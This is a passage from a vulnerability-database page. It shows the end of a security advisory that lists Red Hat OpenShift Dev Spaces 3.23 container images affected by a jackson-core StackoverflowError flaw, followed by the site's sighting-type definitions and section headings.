            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "com.fasterxml.jackson.core/jackson-core: jackson-core Potential StackoverflowError"
    }
  ]
}

Tags

Taxonomy of the tags.

All sightings related to this event Export sightings related to this event

Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-9287 (GCVE-0-2025-9287)

Solutions

Solutions

Solutions

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature